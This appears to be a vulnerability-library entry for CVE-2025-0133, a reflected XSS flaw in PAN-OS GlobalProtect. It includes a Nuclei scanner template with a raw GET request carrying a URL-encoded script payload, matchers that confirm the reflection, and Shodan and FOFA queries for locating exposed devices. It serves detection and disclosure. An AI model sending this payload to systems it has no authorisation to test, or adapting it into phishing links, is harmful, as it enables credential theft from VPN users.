/Vulnerability Library

PAN-OS - Reflected Cross-Site Scripting

CVE-2025-0133
Verified

Description

A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link.The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN.

Severity

Medium

Exploit Probability

4%

Affected Product

pan-os

Published Date

June 13, 2025

Template Author

xbow, dhiyaneshdk

CVE-2025-0133.yaml
id: CVE-2025-0133

info:
  name: PAN-OS - Reflected Cross-Site Scripting
  author: xbow,DhiyaneshDK
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link.The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN.
  impact: |
    Authenticated Captive Portal users can be targeted with phishing attacks via crafted XSS links, potentially leading to credential theft especially when Clientless VPN is enabled.
  remediation: |
    Upgrade to the patched version of PAN-OS as specified in the vendor security advisory.
  reference:
    - https://security.paloaltonetworks.com/CVE-2025-0133
    - https://hackerone.com/reports/3096384
  classification:
    epss-score: 0.03513
    epss-percentile: 0.87565
  metadata:
    verified: true
    max-request: 1
    shodan-query:
      - http.favicon.hash:"-631559155"
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
    fofa-query: icon_hash="-631559155"
    product: pan-os
    vendor: paloaltonetworks
  tags: hackerone,cve,cve2025,xss,panos,global-protect,vuln

http:
  - raw:
      - |
        GET /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>prompt("XSS")</script>'
          - 'authentication cookie'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206432220d9f020d770137d7c47cbdb1dc9fff815de254ed6d2b4c068d56db626702204d76eb963503faceeebca96d5e8dcc86ef3f79e41f26fe1ae6ecdffbe84ef6dd:922c64590222798bb761d5b6d8e72950
5.0Severity

CVSS Metrics

References

https://security.paloaltonetworks.com/CVE-2025-0133https://hackerone.com/reports/3096384

Remediation Steps

Upgrade to the patched version of PAN-OS as specified in the vendor security advisory.